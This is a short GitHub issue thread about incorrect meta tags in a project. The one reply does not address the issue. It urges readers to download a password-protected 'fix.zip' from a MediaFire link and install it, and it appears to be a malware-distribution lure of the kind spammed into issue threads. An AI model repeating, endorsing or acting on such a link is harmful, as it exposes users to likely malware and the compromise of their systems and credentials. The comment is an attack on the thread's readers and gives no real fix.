### ISSUE TITLE
Wrong Project Meta tags used

### ISSUE THREAD

**Issue by abhraneel2004** [anannya07/Projecthub1#1]
This is to inform you that the meta tag used in the current project does not match what we are doing. Could you update it?
![image](https://github.com/user-attachments/assets/18f6ad94-210b-4b65-be01-6fcda3c1a797)

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
